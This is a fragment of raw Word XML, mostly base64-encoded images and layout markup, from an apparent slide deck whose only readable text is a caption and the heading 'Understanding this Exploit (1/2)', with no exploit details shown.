hX4tX3hq88S2Ut5P4dv&#10;RqGnNHcPF5cwKkMQpG4ZReDkcV2fmH1o8w1L3NFscb4z+DPhPx9428K+LNaspLjW/DEjS6ZOlw6L&#10;EzFSSVUgNyo6g1sePvA2j/EzwfqnhfX4HutG1KMRXMMcrRllDBsBlII5A6Vs76XzDSGYfh/wFoXh&#10;vwLZeDrWwjl8OWlkNPSxu/36Nbhdux9+d4K8HOc14Lqf/BO34OX19PLb2Os6XY3Ehln0qx1WVLSV&#10;ic8ockAdgCMV9LeYfWjzDQBxkXwZ8IWnwvufh5ZaJDp3hG4tZLOTT7NmjzG4If5wd245JLE5JOc1&#10;r+BfBOl/DjwjpfhnQrdrXSNNhEFtC8jSFUBJwWYknr3rb30b6AH/ADVw/jL4MeFvH3jbwr4s1qxk&#10;uNb8MyNLpkyXDosTMVJJUEBuVHUGu130b6AOKuPgx4Wuvi1a/EqSxkPi62sjp8V39ocIITu+Xy87&#10;SfnbnGeal+LPwh8NfG7wmfDfi2ykv9J89LnyYrh4T5iZ2nchB7niuw30b6AOI+KPwZ8LfGDwVD4T&#10;8UWMl7okUkcqwx3DxMGjBCncpB4BPeuwgs47ezjtUTMEcYiCNz8oGMHPXipWek8z3oA+cfFH/BP7&#10;4Q+JNYvL+DTNS8Pi9bddWeiX729tN/smLlVXPO1cCvX/AIe/CPwl8KvB58L+FdFg0fR2DeZFCWLy&#10;swwzvIxLOxHGWJOAB0AFdf5nvTfMoGcn8KfhP4b+CvhGPw14Us5LHSI5nnWGSd5jvc5Y7nJNQXHw&#10;b8K3XxatfiTJYynxdbWR0+K7+0OEEJ3fL5edpPztzjPNdn5lHmUCOO+Jfwf8LfFz+wv+EmspL3+x&#10;L5NSsvLuHi8udejHaRuHseK1/HXgvSviN4R1Tw1rsDXOkalCYLmFJGjLISDgMpBHTtW15lHmUAcR&#10;qHwR8G6t8Krf4c6hoyX3hG3tY7SKyuJGZkSPGwiTO4MMDDA5968u8M/sD/Cbw9qFlcXFlqniG3sX&#10;8y00/XNSe5tID6CHhSPZgRX0R5lHmUAcL8Pfgb4O+F0/ih/Dul/Y4fEly13qNo8zSW7uS+dkbEqi&#10;kORtUAYAGMAVyfwx/ZD+Gnwd8X6n4j8K6bd6de6hZy2E0JvZHhEMjKzKqknHKL34xxXs3mUwvzQB&#10;x/wr+EPhf4L+ET4Z8KWL2ejmaS4ME0zzku4AblyTg4HFeR+KP2AfhD4k1i8v4dM1Lw+L1t11Z6Lf&#10;tb203+yYuVVc87VwK+jN9G+gDlPh78JfCPwr8Hnwv4V0aHR9HYN5kUJYvKzDDO8jEs7EcZYk4AHQ&#10;AUz4T/CXw18EvCv/AAjfhKzksNIE73PlSzvMd743Hc5J7Diuu30jSUAcZD8HfCtr8Wrr4kx2Uo8W&#10;3NkNPlu/tDlDCNvy+XnaD8i84zxXbb6h8yjzD61aIPMfjh+0n4C+BFg6eLtT8q+ntJLi00xYJJJL&#10;wDjYpClRk8fMQBnJ4rzP/gnv8I5vhr8FJNZ1HThpmseK7ttTe2KlWgtvu28WDzgLucZ5xLzXvniL&#10;wJ4Y8XXtlea74c0jWruxJNrcajYxXElvkgny2dSV6DpjpW9v+lArnHXHwd8K3XxZtfiTJYynxbbW&#10;R0+K7+0OEEJ3fL5edpPztzjPNY/xj/Zv+H/x2a0m8WaILjUbPi31K0la3uo1ySF8xCCVBJIVsgE5&#10;AzXpPmH1o8w+tILnjPwp/Y/+G3wh8SjxHpunXmreI1GI9V1u7a6ni4IJTOFUkHG4DOOM8mu4m+D/&#10;AIYuPivB8R3spD4shsf7NS7+0PsEGSdvl525+Y84zXXeYfWjzT60xpnmHxq/Zn8A/HmSzufFGlyL&#10;q1muy21bT5jb3cS5zt3j7wB5AYEAk4xk55zw/wDsT/Cbw2dJmt9DuJ9R03U49Xj1K5vpXupLmPBR&#10;pHz8ygjOz7uSTjk17iZCaN9AzzH4z/szeAPjzNZXfirSpH1WyXZb6pYztb3MaZJ2716rkkgMDgkk&#10;YyayPhb+yD8NfhP4mi8Sadpt3qviSFSsWra1ePdzx5BBKgnarYJG4LnBIzya9m3mk30ybk24+tRX&#10;UMV5bywTos0EqFJI5AGVlIwQQeoIpu+gscUWHc8a+GX7I/w1+D/i/U/EPhbTbvT7zULOWxlhN5I8&#10;IhkZWZVVjxyi9+McV2nwr+E3hn4J+FB4c8KWctjpP2h7gRSTvMfMfG47nJPYV1X2pd+3+Kobq8eG&#10;RVUbuM0xHLw/CPwvD8VZviMllKPFc9j/AGa91577DBkHb5eduflHOM1ifGL9nP4ffHRrSbxZovn6&#10;jZ8W+pWsrW91GASQvmIQSoJJCtkAnIGa9EuJnjVcDBY4PtTIZXlRuMbON3qKBHkXwq/ZD+Gvwj8S&#10;L4i02wvNW8RKMR6rrV211NFkEEpnCqSDjcBnHGetezfbYvM2bjuzjpVOyWRHYklRjHNSG3/fAk8Z&#10;3VSA4b41fBHwZ8cdFtNO8X6OuoxW0ha3uo5GintmOMlHU5GcDIOQcDI4FcF4Q/Yh+GHgzXrTXUsN&#10;Q1/VrGQSWU2vX8l0sDA5UqnCnbgY3A4wD1Ga95kxIrKRg5zTvOHyj2pgedfGb9nvwT8erPT4vFmm&#10;SS3dgS1pqNnM0FzbkkEhXHUEgcEEd+vNcj4b/Yp+FHh621RLrR7nxFfajaPYzalrl291crEylT5b&#10;E4jbDH5kAYdjXum+kVgd2aQjynUv2Yfh9qvgPwz4RvdOu59D8OXIu9Ohe+m3xSAsVy+7cwG8gAnG&#10;MDtXfeMvCOk+PvCuqeHtaia40zU7dra6hWRkZkbqAynI+oq+14nmAM2OcCo7m6aLARQzFSxz3xTF&#10;cqeDfCel+AfCml+HdEja30nTYFt7aJ5GcpGvQFmJJ/Gsb4ZfCPwx8IbXV7fwxaSWcWrXz6ldiSd5&#10;d8zABmG4nA4HA4rppmL26MB8rcsF9KbZsyxsOdgOFz6UBc8W+IH7HPws+Jnie48RS2F5oetXJP2m&#10;+0G7a0aZicsXUZUlu7bcnuc811fwd+B/gn4F2dzZ+ENGWy+1uPtN9NI0tzcEE43uxzgZOAMAZ6cm&#10;vQIk8kyBeVb5qGjiMm5gR3oKG3fmRzMNx6fKB3rmm+DXhfUvipb/ABCms5P+Epgsf7PF3577BBkn&#10;b5educsecZrvrPS3upLdGkVJHGRn09aXUIYtNgxFJ5hk4ZhQJmbrNnZ69aTadfQQ3llcobeW2nQP&#10;HLGRgqynggjgg18+6x/wT1+D95rcyWmn61p2nyOZrrTLHVZY7SRic8ockY7AEYr6Fs4xLLGuRsQ7&#10;ye/FW47xLySaQO8KluCw4IoEc7p/w38J+C/BKeDdF0a1tfDfkPA2k+XuhaNwd4fdnfuyclsk5Oa8&#10;AuP2AfhG19cGC01qz0+dzJLpFvq0qWjk/wCzndgc4+bvX0fJfPeXkokcYThSO9VWiluL3Cls5H4Y&#10;pBci8J+D/Cnw58G2HhbRdHttH0OONo47SFCy7T94tnJYkk5LEk55Jrxi1/4J2/BTV/Etxqx0a8Fh&#10;I/myaXa38sVnIc5+4DuABzhVYAZ4Fe5Xxa7ulMTY2r5YJ6c9a6FM6D4fjgzi4bhW9c96AueYeEfg&#10;34Q8B+MPE2peFNFTSbnXfs8VykDsIdsKlY1SPO2MKrEYUCpPCPwf8N/CO912LwvaS2i61enUtTkk&#10;uHl864OSSAxO0fMeBxXfabcLb281zNGpEf3X7kmqrQpd5ZJNznkh6Y9zxHR/2T/h14Z+LUXxH0nS&#10;bjTPECzTXOy3unEHmSKyyN5ecDIduBgc9KzPH37GXw08f+K7jxI9jqGiaxesXurnRL57b7QxOWLL&#10;yuW5yQBnJJ55r3WeN7dgrqV3dz0/CoIZVuOIz8uduaQHF/B34C+Cvgfa3y+E9EWxa5Ia6u5pXmnn&#10;YZxukck4GTwMDknGSa4/4XfCNtP/AGnPiR48g0G40rTr2xhsd91OGOo3TP5s08a7jtjCiJB0yQ3H&#10;Wvari62y/ZRx5Yy/vVE+ZHfI6ttQjB5phY2hfGzkENvCyu/3geRip5rSSa0uPs0apctwVLj5hWFP&#10;PcgnZMVz+tPO/apDHdxubPNAWLthp8/mMoQx4UgselQpaxW+xDMyzpxv7D2qaPWZhCYHkzD03Ac1&#10;BJanAkiYzR/rQBZ+wRXjDzZFS5bjCD79PdotLYIieZcDgZHSo7eFYY/MTLXZ+57VCus2tvqi6dc3&#10;ML6o8ZmEe8b1XON2OuMkDPvQMtNcPbqZZtryEZC7RTLe+udQuo4CqMr8kY6VmXUNy15FbR/vXmyf&#10;M7Yrt9D0mLTIQzESSYwzehpBZFu1tY7eMJEioR95gKsMo42nb6+9EjBMKBx2NVNR1O20nT7q+vJk&#10;trO2iaaaaQ4WNFBLMT6AAmla4i1kUZFcT8N/jN4J+L6ag/g3xHZ+IV08xi6azJIiL7tgOQOuxvyq&#10;po/x++HniDx9N4I03xZp974rhmmt5NKhYmZJIg3mqeMZXY2ee1NKwj0Bie1N5paKYgpdp9KSjfSs&#10;O4N8vJ4pGdUUsxwo702Rt2PSqerxySWTiMZ+XpSAspeQSKWWVWA64NH2iORPkeM/7p5rhJJhZobe&#10;3PBOXOe9SWt8v2iItF5ZBwGV/ve9UI7ZsEfxEZ79q5i6tbq4upmJfbvIX6VsX+oKlo8lu2+aMDK5&#10;zS6bqd1dWqyS22H+lArHHXFw0LR7Ru3Ng1O1wkOBIxGeABUBjV2ye3SkkjMkagNl1OQTQWWY50lQ&#10;OCSKkWQMu5Wzzg4NVYYfJt/KxubHeiyhMEL7gAS5OM0CsaDXG2P0NOWbcVIPXrWPbzSSXAyCRk5B&#10;6D0q15zRSRqoDbzznsKC0afmD1p3mCs64uvIjZzzzgVM0wjUMxwuM0Ay35makVveqUcwZVKnO6pF&#10;uB0yDjrigRb8z3pN49ariQFscUvmbsbecmgRZVx60ofnrVZJOcHg0vmfNgHp1oAt+Z70wyc9ai8y&#10;m7vegLk+/wB6N/vUG73o3e9AXJ9/vRv96r7zS7vegCwsnvTvM96rq1LuoGT+Z70eZ71Buo3UASs/&#10;Snq1QKc0/dQBJvFJ5lR5o4oAlDijeKi4ozQIl3ijeKj/ABo/GgZJvFG8VH+NJmgCXeKN4qLPvRn3&#10;qB2J1cc07f71XVqXdQFiff70b/eoN1OBFAiXf70b/eo8ijIoAk3+9ODDHWocilyKGWTbh60bh61F&#10;mjNQBLuHrRuHrUWaM0AS7h60bh61FmjNAtCXcPWjcPWos0ZoGS7h60bh61FmjNSy1sS7h60bh61F&#10;mjNAEwYUbhUO73o3e9AiXcPWmF+etM3CkyKAJN/vRv8AeomYdqbuoAn3+9G/3qDdRuoAlZxxTd4p&#10;hbPek/GgB/me9LvFRcUZoHYl3ijeKizRmgLEu8UnmVHmmluaAsTeZ70eZ71Buo3UBYn8z3phfnrU&#10;e6k/GgLEu/3o3+9Qk+9CnJxmgLE2/wB6QtURz/CQaRpCuBigCTcPWjcPWomb5vbtSbunY1aIZNuH&#10;rRuHrUCsSccZ701plVwjcMelImxYZx603f71VurryFX5S5bsKVZg8Qde4yAaBlnf70bsdKpwXXnR&#10;BsYbkYqG3mk+1BW5LAllPQH0FAzQypYHdlvTNNku0jZAzYZzgCqs0f75JBwQcYFOePzlwR0OQ3cU&#10;xE803lxszdelPWYtGSnJxkVAcNnPOaI1+XAYjaMCrsQLDcNJGrPw4OCKZDuSSVWZiCcjmnL93kfM&#10;1NZj1xRYY1rdvN+/+73b89/pT5I45sbjjFMkkVeWIC9802SRY0JbBCjmlZjRZVht253D3pd4AwOl&#10;VY7hJEZk6L1zUEN9JIw3KuGXcNv9aVmPQ0fMX15qN50Qjc20npWfJI63KAZ5YD2qW6iM0iOqq+0E&#10;YPTmqRJbmlVVZgchRnNRRXCzQh4/vYpqfKmGHbBXtTVVYYiq/KPUVRQ61uTKp8zhlbFNgieG4nLE&#10;+W3IOacu1sqoGTyc0NwuSe9BLIprfzZgVPBOW9sVJLGsmA2flOQaGPz4JCn09aje8W2+8pZsZwKC&#10;bE6ttwE7UpkDNjOCaqTXWy3EsY4bpmi3kM8ZJwHjYqSO9AWLG48N1AOKSKWKa6WAt8zcY/pVa3Vo&#10;pZEyXQYYE+9PtbF31BNjBRvDl+4oGbuqXC2GnpJA3KjaSx5+grkvil450L4X+A7vWvEF8un6ZaRe&#10;fLO2Sck4CqByzEkAAckkV1N3Hb6hcIQPNtIRkt/eavmv9t74+eBPhfo+j6J4p8GxePNRv5DPZaDc&#10;bRDtT5RLIxVscsQoCkkg9OtAM82j/wCCoPg6zmeePwT4kudLSTyBqA8pRkjn5d2M45C7vyr6u+Gv&#10;xU8O/Eb4YWXjLQ79LvQ7hHJkuMRtblSQ6yAn5SpBz27gkEGvz6+PnxM+L2m/s5T6DqHwm0H4bfDW&#10;6ljsoLUuDcxszmcIkZk3K2ULEtHnqevI91/Y9+GMurfsUf8ACPTTvZP4ut9SYzDJMKzb4FcDPPyo&#10;rde9IRU8Vf8ABSDwLp+rX9p4b8N654ttrPmbUbOFYoMf3hu+bbnuyrmvW/2cf2sPBn7QlnqUehm6&#10;07WrOMPcaXqCqswjJx5iFSQ6ZIBI5BIyBkZ+HvDLfH79hM6vbxeGbfWfCclx9oublLc3Vo+F2+Z5&#10;sZDxfKB/rMDgfL6/Uv7HvxS+G/xh07VNV8L+AtL8HeLreTGsG1tY/MbzSWDLMFDNGxRjtOMFenQk&#10;A+otHsxdX0UZOVB3GvCv2m/23PAnwV8Vf8I5Il94i8RRKofTdKVT5BIBUSOxAUkHIUbm5GQAQa92&#10;s7w6H4f1bV2jM5t4XkRF6ttUnH1OK/Ib9l/xZ45uvih4o+IGlfD+X4m+IHLPczGYR/ZJrh2Yy9D8&#10;zbXAx0G4UAfb3wZ/bp8I/F7xN/wicmn6l4Y8QSZEFnqirtnZQSUVlPDhQThgM9Bk1o/HP9rrQvgD&#10;4o0fSvEGgaxJbapAJrfVLRY2g279rg5YNuTgkAdGX1r5a8ceEvi98Yvj94D8aXHwmvvCVxpl3ZR3&#10;NwkokV1juA4ldsL91SR34Uele4/8FFrTwlN8BwNcuo7TXIbtJNDRVDSyzZAkQDrsMZO49AQh5O0E&#10;Gel/Gb9rPwj+z/oelXetTy65PqnzWlhp5SSWWHGfOyzACPoM55J4zg4nm/aK0jw58Bbr4uat4Y1n&#10;Q9KzG9vpl15f2q4SSRI43C7sAMX3DJB2jPQivhD9hr4SaZ8fPiRcan4y1X+108L2tsLbRbpmkM8a&#10;5SIHPHkx7VGwdSyg8HDfRH/BUbxcNH+D/hXwxFIVfVNV+0OP70cEZyMem6WM/gKBkt5/wUm8DSaE&#10;up2HhzX9SvnDPcWUcKA2kYbaGlkyVG7qMZ98Zr2L4A/tKeE/2htDu7zQVubS+sGVbzTr5QJYd2dj&#10;ZUkMrbTgg9jkCsT9kHwbpHw//Zx8Jrbx2sZ1fTl1TUZWCkTtMu8mQnqFRgnPQLivlH/gn3eWll8d&#10;viXq2nRsfDsOl3JgiiXHBuUeAAdvkRx+NAH1H8dv2zvA/wAEdcTQZo73xF4kwC+m6WqkwbgCokdi&#10;ApIOQo3N0yACDVD4J/tveDfi54v/AOEYmsNR8LeIZNwgtdUVdszAElFcHhgAThgM9Bk18T/st+Jv&#10;Hlz8TvE3j/RPAE/xL17Je5nWYRm0luHZjJ904ZtjgY6DcO9ej+PvCfxd+Mnx88C+Nbv4TX3hGfT7&#10;qyjubhJBIrrHcBxK5wp+VSR34UelAH218YPjn4R+Bnh0az4o1DyFuCVtbOBfMuLphjIjTPOMjJJC&#10;jIyRkV4D4Y/4KdeB21q2i1Xw1ruk6fMcJfMsciKucb2jU5Iz127jx0NeN/F3T2+N/wDwUA0fwTqx&#10;efQtPu7ezFrIxCmBIRczDHbed4yOSMegr7d+Mfw3+F3xA8P6T4d8cx6db6dBJ5mlWBvBZNlF2fut&#10;rK20BgCq8fd44FAHM/tIftUaN8C/h3aa5ZmXUtZ8SW8w0ieyMckKkw7opjuODHl4zxng9K+Vv2Af&#10;jNca98Xtc0/XjqviHxj4rdJDq07rIkMNvHK7ByW3AEsAFUYGFHAr1r9uQ6T8J/2TbXwnoMX2TT76&#10;8tdMtYfPeUpArNPgO7MxUeUByTwwHStr9nuPUPgv/wAE9tS8R2Ra31Q6Lf6tBIi8ieQOYZMH+6oi&#10;P/AaAOn+KH7e3w/+EHiq58J6Zp+qeOfEcTmC6j0dFMVvIPvRiRjlnHcIpA5BIIIrvv2af2zvAn7R&#10;l5daFpMN9oXiKziMz6TqiqHkjBAZ43UlWwWAIOG74xzXwb+wn4s+IXw303xJ4o8F/Byf4i3GoTiy&#10;k1pbvyzbbFDvCvysct5iMx7/AC+len/DT4d/Fnxd+3ToHxU1P4V33gHTridm1Abw8Kf6I8TuWwOX&#10;4zxyze9ID6x/aU/bE8DfszR2lrrhutW1+8j8230bTgpl8vJHmSMxAjQkEAnJODgHBx86/Ez/AIKM&#10;eCfih+z78R9Js7LUvC/iqfSGtrWx1JVxdJcMsLGF1JyypIXIIU45GQCR5z8CdJtv2kP+CjXjTV/F&#10;CLqlnoc99fW1pdKGRktpktrZCp7IHRsf3kyeprrv+Cu8WiLp/wAOpTBCPEckt2BMuBIbVVjyrdyN&#10;7Ltz0+fHU0CPQv8Agln4Xj8K/s46z4luh5Z1fVp5/NP/AD7wIsY/JxNXin/BMLw7efED4/ePviTf&#10;x7xb28uZGH/L1eTbyQfZI5Qf98V9X/Dvw/P8Kv2B7aztreQ6ha+Cri9FvEhaQ3M1vJOUAHJbzJSP&#10;rWd/wTp+FM/ww/Zv06bULSSz1fxBdS6pcxTIVkRSRHEpB5HyRq2O280AfT+aMjvnFFJ+GaQxdpPO&#10;047UVR1SO7ZPNtZApj5ZHPFVtH1xtTkeJosSIOSp4NWQa9QX6s1jOqZ3FDjFTsyjBByMc1W1C8Fj&#10;ZyzHGVUkZ6VIHmvnbmkU8sp5HeoLe6kuLlYjH5jPkgJ1TFbFnodzqEk966KvmnKqvStrw/4ffTrw&#10;zyRqjEYOBnPvVAQaf4fkuVS5dnibaRtzjce2fWnw+I7zTU+z3Ef7xOPwrqXX5Mds8fWsPVLG3uLx&#10;mkm+foelAHNLTl+8KKKBjv4qYv8ArPxoooKJ4P8AlpUD/wDH3FRRQAmpf8ew/wB+rF5/x6/8BFFF&#10;ACW3/HvH/umm6f1noooAnX/j6qVfvp9aKKCCVf8AXD60jf8AHwaKKAJKKKKACiiigAooooAVadRR&#10;QaLYKKKKAY6PvT6KKBBRRRQAUUUUEsKKKKAQUUUUFBRRRUFhRRRQAU5elFFBLFooooEFOXpRRSZY&#10;UUUVIBRRRQSwooooEFFFFBYUUUVLKQUUUUAFFFFADaKKKAGtSUUUAFFFFABRRRQMKKKKCgooooAK&#10;jb7xoooASiiigAooooAa1JRRQAR/fNKf9ZRRSAY3+sWmr/D/AL1FFaIzZFD/AMfk1RXH/H3FRRSE&#10;Puv9bD/utTLX/UJRRQAkP+qb/eqX/l4H0NFFACr978alH3TRRTW4mJTR940UVqZBJ1j/ABpjf64f&#10;SiigpFTVP9XF9aWb/j1b/doooGLB92X6n+QqtZfek/3KKKANCTqPwoh+4KKKlADU1vumiiqAbH/r&#10;G+lK3/HuPr/WiigClef8fUf1FSXn+vT/AHTRRQBC3/ILX6U/Tv8Aj1k/3qKKALS/dP0FWNN/1x+h&#10;oooAlt/+QC3/AF0/rX56/wDBQr/k7r4T/wDXrYf+l8lFFIDrP+Co3/JJ/Cv/AGMD/wDoh6s+JP8A&#10;kyH4Zf8AYIi/9EmiijqSez+Cf+TZNN/7FGP/ANIhXyr/AMEr/wDkJfEf/rlp/wD7c0UUB0P0kh/5&#10;Euf/AHDX5r/8Esf+Q18Rv+vax/8AQp6KKBo+kNL/AOToPEH/AFyg/wDSeOvlX/gqJ/yUzwd/2CH/&#10;APRzUUUMZif8E0/+TktR/wCwHdf+joK7/wD4Kvf8hz4c/wDXG/8A/Qreiil0A9W+GP8AyYzbf9ih&#10;ff8AouavJv8AgmL/AMgf4jf9dLH/ANBnoopiD/glH/yMXxE/697H/wBCnr6RP/J0XiH/AK42/wD6&#10;TR0UUIZ8peJP+Un9v/2FbP8A9II6k/4Knf8AJSPBH/YGf/0c1FFIDsv+ClH/ACSH4ef9fp/9EV7z&#10;df8AKO+P/snZ/wDTYaKKfURxX/BJP/ki/i3/ALGFv/SaGvYvgb/yWb4kf9ha7/8AR7UUVIz5D/Yt&#10;/wCUh3xH/wCuuuf+lgrH/wCCtH/Jc/Cv/YvJ/wClE9FFAH6g+Ef+RT0X/ryg/wDRa1r0UUAFNk+4&#10;aKKAIrj/AI95/wDcrmvBv/IWuv8AdNFFWQdQf9V+NZ3ib/kEyf7tFFAEmif8g+H6VozfeoooAaOg&#10;/wB4VyGqf8hK5/36KKAP/9lQSwMEFAAGAAgAAAAhAHz18+XcAAAABgEAAA8AAABkcnMvZG93bnJl&#10;di54bWxMj81qwzAQhO+FvoPYQm+N7OYX13IIIe0pFJoUSm4ba2ObWCtjKbbz9lV6SS8Dwywz36bL&#10;wdSio9ZVlhXEowgEcW51xYWC7/37ywKE88gaa8uk4EoOltnjQ4qJtj1/UbfzhQgl7BJUUHrfJFK6&#10;vCSDbmQb4pCdbGvQB9sWUrfYh3JTy9comkmDFYeFEhtal5Sfdxej4KPHfjWON932fFpfD/vp5882&#10;JqWen4bVGwhPg78fww0/oEMWmI72wtqJWkF4xP/pLZtPZsEfFczjSQQyS+V//OwX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IvHdBPyAgAAnAgAAA4AAAAAAAAAAAAA&#10;AAAAPQIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAH3g1c7imgEA4poBABQAAAAAAAAA&#10;AAAAAAAAWwUAAGRycy9tZWRpYS9pbWFnZTEuanBnUEsBAi0AFAAGAAgAAAAhAHz18+XcAAAABgEA&#10;AA8AAAAAAAAAAAAAAAAAb6ABAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQA3ncEYugAA&#10;ACEBAAAZAAAAAAAAAAAAAAAAAHihAQBkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAG&#10;AAYAfAEAAGmi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0744" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:110871;height:44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yUiyQAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvhf6H8Aq9FE22XapsjbIIBUEP1SrY22Pz3F26eVmSqNt/bwqFHoeZ+YaZLQbbiQv50DrWkI0V&#10;COLKmZZrDfvP99EURIjIBjvHpOGHAizm93czLIy78pYuu1iLBOFQoIYmxr6QMlQNWQxj1xMn7+S8&#10;xZikr6XxeE1w28lnpV6lxZbTQoM9LRuqvndnq+Gp/Pg69Nl6eayzqXJ+cyxPa6f148NQvoGINMT/&#10;8F97ZTS85GqS5/D7J30BOb8BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAIVclIskAAADf&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:imagedata r:id="rId56" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 65150" o:spid="_x0000_s1028" style="position:absolute;left:84867;top:42481;width:5574;height:3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eZjxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasJA&#10;FIX3Bd9huIXu6iSCQdNMRLTFLKsW1N0lc5uEZu6EzDRJ+/SdhdDl4fzxZZvJtGKg3jWWFcTzCARx&#10;aXXDlYKP89vzCoTzyBpby6Tghxxs8tlDhqm2Ix9pOPlKhBF2KSqove9SKV1Zk0E3tx1x8D5tb9AH&#10;2VdS9ziGcdPKRRQl0mDD4aHGjnY1lV+nb6PgsOq218L+jlX7ejtc3i/r/XntlXp6nLYvIDxN/j98&#10;bxdaQbKMlwEg4AQUkPkfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAM895mPHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="31053606" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:sz w:val="66"/>
                          </w:rPr>
                          <w:t xml:space="preserve">as </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 65151" o:spid="_x0000_s1029" style="position:absolute;left:89058;top:42481;width:19129;height:3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UP4xwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvuknBoKmriG0xx9YIaW+P7GsSzL4N2a1J++u7BcHjMDPfMJvdaFpxpd41lhXEiwgE&#10;cWl1w5WCc/46X4FwHllja5kU/JCD3XY62WCq7cDvdD35SgQIuxQV1N53qZSurMmgW9iOOHhftjfo&#10;g+wrqXscAty08jGKEmmw4bBQY0eHmsrL6dsoOK66/Udmf4eqffk8Fm/F+jlfe6UeZuP+CYSn0d/D&#10;t3amFSTLeBnD/51wBeT2DwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKBxQ/jHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="161ABEAD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:sz w:val="60"/>
                          </w:rPr>
                          <w:t>expected!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3118E67" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId57"/>
          <w:headerReference w:type="default" r:id="rId58"/>
          <w:footerReference w:type="even" r:id="rId59"/>
          <w:footerReference w:type="default" r:id="rId60"/>
          <w:headerReference w:type="first" r:id="rId61"/>
          <w:footerReference w:type="first" r:id="rId62"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="2040" w:right="1440" w:bottom="180" w:left="1464" w:header="156" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3390E8C6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1464" w:right="17535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0" wp14:anchorId="4C35CF73" wp14:editId="47644877">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>876300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="11306175" cy="5600700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340745" name="Picture 340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45" name="Picture 340745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13061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93EC839" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="61" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Understanding this Exploit (1/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589419CF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:ind w:left="7596" w:right="-1230"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D3CE754" wp14:editId="54836325">
            <wp:extent cx="6162675" cy="28575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340747" name="Picture 340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47" name="Picture 340747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7589" w:tblpY="-81"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9776" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="64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776"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="5AE5DE58" w14:textId="77777777">
